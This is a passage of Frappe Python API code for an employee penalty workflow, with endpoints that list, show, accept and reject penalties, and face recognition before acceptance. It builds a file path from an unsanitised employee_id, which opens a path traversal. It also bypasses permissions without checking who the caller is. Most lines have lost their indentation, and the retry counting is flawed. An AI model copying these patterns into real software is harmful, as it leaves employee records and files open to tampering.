result = frappe.get_list("Penalty", filters={"recipient_employee": employee}, fields=["name", "penalty_issuance_time", "workflow_state"], order_by="modified desc")
if len(result) > 0:
return response("Success", 200, result)
else:
return response("Resource not found", 404, None, "No penalties found for {employee}".format(employee=employee))
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_penalty_details(penalty_name: str = None) -> dict:
"""This method gets the details of a specific penalty provided the name of the penalty document.
Args:
penalty_name (str): Name of the penalty document.
Returns:
dict: {
message (str): Brief message indicating the response,
status_code (int): Status code of response.
            data (dict): Penalty details.
error (str): Any error handled.
}
"""
if not penalty_name:
return response("Bad Request", 400, None, "penalty_name required.")
if not isinstance(penalty_name, str):
return response("Bad Request", 400, None, "penalty_name must be of type str.")
try:
penalty_doc = frappe.get_doc("Penalty", {"name": penalty_name})
if not penalty_doc:
return response("Resource not found", 404, None, "No penalty of name {penalty_doc} found.".format(penalty_doc=penalty_doc))
return response("Success", 200, penalty_doc.as_dict())
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def accept_penalty(employee_id: str = None, file: str = None, docname: str = None) -> dict:
""" This is an API to accept penalty. To Accept Penalty, one needs to pass the face recognition test.
Image file in base64 format is passed through face regonition test. And, employee is given 3 tries.
If face recognition is true, the penalty gets accepted.
If Face recognition fails even after 3 tries, the image is sent to legal mangager for investigation.
    Args:
        employee_id (str): ID of the employee accepting the penalty.
        file (str): Base64 url of captured image.
        docname (str): Name of the penalty doctype
Returns:
dict: {
message (str): Brief message indicating the response,
status_code (int): Status code of response.
data (dict): penalty accepted document as dictionary,
error (str): Any error handled.
}
"""
    if not employee_id:
        return response("Bad Request", 400, None, "employee_id required.")
    if not file:
        return response("Bad Request", 400, None, "base64 encoded file required.")
    if not docname:
        return response("Bad Request", 400, None, "docname required.")
    if not isinstance(employee_id, str):
        return response("Bad Request", 400, None, "employee_id must be of type str.")
    if not isinstance(file, str):
        return response("Bad Request", 400, None, "file must be base64 encoded type str.")
    if not isinstance(docname, str):
        return response("Bad Request", 400, None, "docname must be of type str.")
try:
OUTPUT_IMAGE_PATH = frappe.utils.cstr(frappe.local.site)+"/private/files/"+employee_id+".png"
penalty_doc = frappe.get_doc("Penalty", docname)
if not penalty_doc:
return response("Resource not found", 404, None, "No penalty of name {penalty_doc} found.".format(penalty_doc=penalty_doc))
        penalty_doc.retries = cint(penalty_doc.retries) - 1
        image = upload_image(file, OUTPUT_IMAGE_PATH)
        if recognize_face(image):
            # face recognized: accept the penalty (see docstring)
            penalty_doc.verified = 1
            penalty_doc.workflow_state = "Penalty Accepted"
            penalty_doc.save(ignore_permissions=True)
            file_doc = frappe.get_doc({
                "doctype": "File",
                "file_url": "/private/files/"+employee_id+".png",
                "file_name": employee_id+".png",
                "attached_to_doctype": "Penalty",
                "attached_to_name": docname,
                "folder": "Home/Attachments",
                "is_private": 1
            })
            file_doc.flags.ignore_permissions = True
            file_doc.insert()
            frappe.db.commit()
            return response("Success", 201, penalty_doc.as_dict())
        else:
            if cint(penalty_doc.retries) == 0:
                # recognition failed on the last allowed try: flag as
                # unverified and alert the legal manager (see docstring)
                penalty_doc.verified = 0
                send_email_to_legal(penalty_doc)
            # persist the decremented retry count
            penalty_doc.save(ignore_permissions=True)
            frappe.db.commit()
            return response("Unauthorized", 401, None, "Face not recognized.")
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def reject_penalty(rejection_reason: str = None, docname: str = None):
""" This method rejects a penalty given a reason and penalty document name.
Args:
rejection_reason (str): Basis and/or reasoning due to which the employee is rejecting the issuance of penalty.
docname (str): Name of the penalty doctype.
Returns:
dict: {
message (str): Brief message indicating the response,
status_code (int): Status code of response.
data (dict): penalty rejected document as dictionary,
error (str): Any error handled.
}
"""
if not rejection_reason:
return response("Bad Request", 400, None, "rejection_reason required.")
if not docname:
return response("Bad Request", 400, None, "docname required.")
if not isinstance(rejection_reason, str):
return response("Bad Request", 400, None, "rejection_reason must be of type str.")
if not isinstance(docname, str):
return response("Bad Request", 400, None, "docname must be of type str.")
try:
penalty_doc = frappe.get_doc("Penalty", docname)
if not penalty_doc:
return response("Resource not found", 404, None, "No penalty of name {penalty_doc} found.".format(penalty_doc=penalty_doc))
if penalty_doc.workflow_state == 'Penalty Issued':
penalty_doc.reason_for_rejection = rejection_reason
penalty_doc.workflow_state = "Penalty Rejected"
penalty_doc.save(ignore_permissions=True)
frappe.db.commit()
return response("Success", 201, penalty_doc.as_dict())
else:
return response("Bad Request", 400, None, "Penalty has not yet reached workflow state of 'Penalty Issued'.")
except Exception as error:
return response("Internal Server Error", 500, None, error)
|